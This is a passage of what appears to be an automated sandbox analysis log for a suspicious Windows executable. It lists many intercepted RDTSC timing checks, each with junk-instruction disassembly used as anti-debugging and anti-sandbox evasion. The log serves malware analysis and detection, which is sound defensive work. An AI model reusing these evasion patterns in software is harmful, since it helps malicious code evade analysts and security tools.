                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11B6901 second address: 11B6905 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11B6905 second address: 11B690E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11B99E4 second address: 11B9A27 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65CC527CA1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F65CC527CA8h 0x00000010 jmp 00007F65CC527CA4h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11B9A27 second address: 11B9A3D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65CD2EDEEAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jnl 00007F65CD2EDEE6h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11B9A3D second address: 11B9A41 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 1131112 second address: 113112C instructions: 0x00000000 rdtsc 0x00000002 jns 00007F65CD2EDEE6h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jnp 00007F65CD2EDEEEh 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11BCE9F second address: 11BCED4 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F65CC527CA3h 0x0000000d jmp 00007F65CC527CA7h 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11C1A92 second address: 11C1AA8 instructions: 0x00000000 rdtsc 0x00000002 js 00007F65CD2EDEE8h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jl 00007F65CD2EDEFAh 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11C1AA8 second address: 11C1AAC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11C1AAC second address: 11C1AB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11C1C3A second address: 11C1C54 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F65CC527CA1h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11C1DF6 second address: 11C1E00 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F65CD2EDEECh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11C1FB3 second address: 11C1FDE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65CC527C9Eh 0x00000007 jmp 00007F65CC527CA9h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11CC377 second address: 11CC37B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11CC37B second address: 11CC38E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 jnl 00007F65CC527CA9h 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11397AC second address: 11397B6 instructions: 0x00000000 rdtsc 0x00000002 js 00007F65CD2EDEECh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11CB955 second address: 11CB959 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11CBD7C second address: 11CBD98 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65CD2EDEF5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11CBD98 second address: 11CBD9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11CBD9D second address: 11CBDA2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11CBDA2 second address: 11CBDD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007F65CC527CA9h 0x0000000d jp 00007F65CC527C96h 0x00000013 popad 0x00000014 pop edx 0x00000015 pop eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11CBDD1 second address: 11CBDD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11CBDD7 second address: 11CBE0B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007F65CC527CA9h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F65CC527CA3h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11D1E68 second address: 11D1E6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11D1E6E second address: 11D1E7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 je 00007F65CC527C96h 0x0000000b pop esi 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11D1E7A second address: 11D1EA3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007F65CD2EDEE6h 0x00000009 jmp 00007F65CD2EDEF5h 0x0000000e jl 00007F65CD2EDEE6h 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11D1EA3 second address: 11D1EA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11D1EA7 second address: 11D1EAD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11D0774 second address: 11D07B3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65CC527CA8h 0x00000007 jns 00007F65CC527C96h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jc 00007F65CC527C9Ah 0x00000015 push edi 0x00000016 pop edi 0x00000017 pushad 0x00000018 popad 0x00000019 js 00007F65CC527C9Ah 0x0000001f push edx 0x00000020 pop edx 0x00000021 push ecx 0x00000022 pop ecx 0x00000023 push esi 0x00000024 jng 00007F65CC527C96h 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11D0940 second address: 11D0944 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11D0D43 second address: 11D0D4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F65CC527C96h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11D0D4D second address: 11D0D58 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11D0D58 second address: 11D0D6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F65CC527C9Dh 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11D0D6E second address: 11D0D74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11D0D74 second address: 11D0D78 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11D0EBA second address: 11D0EBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 117DFA2 second address: 117E027 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F65CC527CA6h 0x00000008 jmp 00007F65CC527CA5h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push esi 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 push esi 0x00000016 pop esi 0x00000017 popad 0x00000018 pop esi 0x00000019 nop 0x0000001a jnl 00007F65CC527CA1h 0x00000020 jmp 00007F65CC527C9Bh 0x00000025 adc cl, FFFFFFCCh 0x00000028 push 00000004h 0x0000002a push 00000000h 0x0000002c push edx 0x0000002d call 00007F65CC527C98h 0x00000032 pop edx 0x00000033 mov dword ptr [esp+04h], edx 0x00000037 add dword ptr [esp+04h], 0000001Dh 0x0000003f inc edx 0x00000040 push edx 0x00000041 ret 0x00000042 pop edx 0x00000043 ret 0x00000044 push eax 0x00000045 jo 00007F65CC527CA2h 0x0000004b jbe 00007F65CC527C9Ch 0x00000051 push eax 0x00000052 push edx 0x00000053 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11D106C second address: 11D1072 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11D1072 second address: 11D1079 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11D954B second address: 11D9555 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11D760E second address: 11D7622 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jl 00007F65CC527C96h 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edx 0x0000000d pop edx 0x0000000e ja 00007F65CC527C96h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11D774A second address: 11D775B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jbe 00007F65CD2EDEECh 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11D775B second address: 11D776C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnl 00007F65CC527C96h 0x00000009 jnl 00007F65CC527C96h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11D776C second address: 11D7776 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11D7A41 second address: 11D7A47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11D7A47 second address: 11D7A50 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11D7A50 second address: 11D7A56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11D7A56 second address: 11D7A88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F65CD2EDEF1h 0x00000009 jmp 00007F65CD2EDEF2h 0x0000000e popad 0x0000000f popad 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 jnl 00007F65CD2EDEE6h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11D7A88 second address: 11D7AB3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65CC527CA7h 0x00000007 jnl 00007F65CC527C96h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push edi 0x00000011 pop edi 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11D7AB3 second address: 11D7AB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11D7D6B second address: 11D7D7B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F65CC527C9Ah 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11D7D7B second address: 11D7D7F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11D7D7F second address: 11D7DA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F65CC527CA7h 0x0000000d jng 00007F65CC527C96h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11D7DA4 second address: 11D7DE1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65CD2EDEF3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c ja 00007F65CD2EDEEAh 0x00000012 push edi 0x00000013 pop edi 0x00000014 push eax 0x00000015 pop eax 0x00000016 push eax 0x00000017 push edx 0x00000018 push esi 0x00000019 pop esi 0x0000001a jmp 00007F65CD2EDEF5h 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11D7DE1 second address: 11D7DE7 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11D8352 second address: 11D8358 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11D8358 second address: 11D8377 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F65CC527CA6h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11D8377 second address: 11D837D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11D837D second address: 11D838E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65CC527C9Dh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11D838E second address: 11D8398 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11D8398 second address: 11D839E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11D839E second address: 11D83A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11D83A2 second address: 11D83C8 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 jbe 00007F65CC527CB4h 0x0000000d push esi 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 jmp 00007F65CC527CA2h 0x00000015 pop esi 0x00000016 push edi 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11D867F second address: 11D8683 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11D8683 second address: 11D868F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11D868F second address: 11D86A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F65CD2EDEEFh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11D894C second address: 11D8968 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65CC527CA8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11D8968 second address: 11D8980 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F65CD2EDEE8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ecx 0x0000000b pushad 0x0000000c ja 00007F65CD2EDEE6h 0x00000012 push esi 0x00000013 pop esi 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11D8980 second address: 11D8988 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11D8F65 second address: 11D8F79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F65CD2EDEECh 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11D8F79 second address: 11D8F86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jne 00007F65CC527C9Eh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11D9260 second address: 11D9270 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F65CD2EDEE6h 0x0000000a jp 00007F65CD2EDEE6h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11D9270 second address: 11D9274 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11D9274 second address: 11D928D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F65CD2EDEEFh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11D928D second address: 11D9293 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11DEE84 second address: 11DEE96 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65CD2EDEEEh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11E2C35 second address: 11E2C4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F65CC527CA2h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11E2C4B second address: 11E2C55 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F65CD2EDEE6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11E2C55 second address: 11E2C61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11E2C61 second address: 11E2C68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop ecx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11E2C68 second address: 11E2C6D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11E2C6D second address: 11E2C73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11E2C73 second address: 11E2C79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11E2C79 second address: 11E2C99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F65CD2EDEF2h 0x0000000b jo 00007F65CD2EDEE6h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11E23E3 second address: 11E23E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11E23E7 second address: 11E23FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e pop edi 0x0000000f push esi 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11E27E6 second address: 11E27FD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnl 00007F65CC527C96h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jo 00007F65CC527C98h 0x00000015 push edx 0x00000016 pop edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11EA0EB second address: 11EA0FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11EA2E1 second address: 11EA305 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jnl 00007F65CC527C98h 0x0000000f pushad 0x00000010 popad 0x00000011 jnp 00007F65CC527C9Eh 0x00000017 jl 00007F65CC527C96h 0x0000001d push eax 0x0000001e pop eax 0x0000001f push esi 0x00000020 push ebx 0x00000021 pop ebx 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
